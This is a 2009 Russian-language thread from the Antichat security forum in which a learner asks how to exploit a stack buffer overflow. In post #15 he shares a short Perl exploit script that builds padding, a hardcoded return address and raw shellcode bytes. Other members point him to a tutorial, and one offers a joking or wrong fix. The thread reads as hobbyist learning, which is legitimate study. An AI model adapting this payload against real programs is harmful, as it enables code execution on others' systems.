HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > Реверсинг
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 13.11.2009, 13:48
wofan
Познающий
Регистрация: 17.09.2008
Сообщений: 33
Провел на форуме:
99461

Репутация: 3
По умолчанию

сенкс понял только никак незапущу шелкод на исполнения.
получается вот такая хрень вбиваю 28 букв затем адрес возврата.
в Olly видна как оно переходит на адрес возврата.
затем питаюсь вбить експлоит после адреса возврата но он затрагивает адрес возврата.што делать непойму.
 
Ответить с цитированием

  #12  
Старый 13.11.2009, 14:08
gold-goblin
Познавший АНТИЧАТ
Регистрация: 26.03.2007
Сообщений: 1,095
Провел на форуме:
5265510

Репутация: 455


По умолчанию

лучше тему в реверсинг.
Цитата:
вбить експлоит
эксплойт никуда не надо вбивать... надо шел код вбивать.
 
Ответить с цитированием

  #13  
Старый 13.11.2009, 14:13
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
Провел на форуме:
2083691

Репутация: 330
По умолчанию

ТС, вот для кого грейт старался, писал статью, все разъяснял, с примерами, а?
Неужели так трудно заюзать поиск по форуму?

http://forum.antichat.ru/thread26791.html
 
Ответить с цитированием

  #14  
Старый 15.11.2009, 11:41
wofan
Познающий
Регистрация: 17.09.2008
Сообщений: 33
Провел на форуме:
99461

Репутация: 3
По умолчанию

разобрался только неможу вбить правельний адрес возврата.
вбиваю "\x40\xfb\x22\x00" а оно вместо первих нулей пишет 20.
што делать подскажите.
 
Ответить с цитированием

  #15  
Старый 15.11.2009, 18:07
wofan
Познающий
Регистрация: 17.09.2008
Сообщений: 33
Провел на форуме:
99461

Репутация: 3
По умолчанию

Ладно обясню по подробней.
есть мой exploit на Perl:
#!perl
$Poc = "\x61" x28;
$returnadr = "\x40\xfb\x22\x00";
$shellcode = "\x33\xC0\xB8\x8F".
"\x7A\x83\x7C\x68".
"\x00\x04\x00\x00".
"\x68\x00\x03\x00".
"\x00\xFF\xD0\x33".
"\xC0\xB8\xFA\xCA".
"\x81\x7C\xFF\xD0";
print "$Poc$returnadr$shellcode";.
загвоздка в том што строка "\x40\xfb\x22\x00" должна давать адрес возврата 0022fb40,а она почемуто вместо етаво дайот 2022fb40.
тоесть "\x00" принимаетса за 20 ходя должно приниматса за 00.
 
Ответить с цитированием

  #16  
Старый 16.11.2009, 04:50
Lazy_Student
Banned
Регистрация: 14.11.2009
Сообщений: 5
Провел на форуме:
6038

Репутация: -15
По умолчанию

смини в стрроке \x40\xfb\x22\x00 на \x40\xfb\x22\x20 и все будит ok

зы: сначала прочол тему как у мня "переполнение мочевого пузыря" г г г
 
Ответить с цитированием

  #17  
Старый 16.11.2009, 10:26
wofan
Познающий
Регистрация: 17.09.2008
Сообщений: 33
Провел на форуме:
99461

Репутация: 3
По умолчанию

тоже сомое.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Проверка объема буфера GivioN С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 1 16.03.2009 10:12
Переполнение буфера в Php nc.STRIEM Мировые новости. Обсуждения. 3 18.12.2006 20:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ